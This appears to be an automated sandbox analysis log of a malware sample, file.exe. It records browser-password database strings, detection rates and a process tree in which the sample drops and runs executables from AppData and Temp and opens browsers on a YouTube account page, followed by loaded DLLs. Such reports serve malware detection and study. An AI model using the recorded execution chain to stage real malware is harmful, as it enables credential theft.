Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2450595340.000000006CD6F000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.2208818096.0000000022B29000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2222496195.0000000022B1A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT sum(count) FROM events;9
Source: firefox.exe, 00000021.00000003.3388400967.00000169CB269000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3400060531.00000169CB26A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2413692880.000000001CBA7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2445235619.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe ReversingLabs: Detection: 36%
Source: file.exe Virustotal: Detection: 46%
Source: RoamingBKJEGDGIJE.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: RoamingIJEGDBGDBF.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorti.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe"
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2036 -s 2456
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1056
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\5aa32fec17.exe "C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,12986128645903836916,990054772978296775,262144 /prefetch:3
Source: unknown Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation
Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate https://www.youtube.com/account
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1908,i,2461605866906430469,16426006232859990592,262144 /prefetch:8
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2356 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54a18292-6da0-4808-9925-4c7144e972d8} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169b956bf10 socket
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7216 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7368 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1336 -s 1328
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4380 -parentBuildID 20230927232528 -prefsHandle 4008 -prefMapHandle 4124 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4885320-d06e-4770-870c-611d160c432d} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169cbbee210 rdd
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe "C:\Users\user\AppData\RoamingBKJEGDGIJE.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe "C:\Users\user\AppData\RoamingIJEGDBGDBF.exe" Jump to behavior
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe "C:\Users\user\AppData\Local\Temp\1000002001\7ca32398cd.exe"
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process created: C:\Users\user\1000003002\5aa32fec17.exe "C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Users\user\1000003002\5aa32fec17.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5175.tmp\5176.tmp\5177.bat C:\Users\user\1000003002\5aa32fec17.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.youtube.com/account"
Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=1908,i,2461605866906430469,16426006232859990592,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1992,i,12986128645903836916,990054772978296775,262144 /prefetch:3
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7216 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7368 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7884 --field-trial-handle=2272,i,17408015981924846693,9755921659909947626,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2356 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 238690 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54a18292-6da0-4808-9925-4c7144e972d8} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169b956bf10 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4380 -parentBuildID 20230927232528 -prefsHandle 4008 -prefMapHandle 4124 -prefsLen 26265 -prefMapSize 238690 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d4885320-d06e-4770-870c-611d160c432d} 3132 "\\.\pipe\gecko-crash-server-pipe.3132" 169cbbee210 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe Process created: unknown unknown
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe Section loaded: windows.storage.dll Jump to behavior
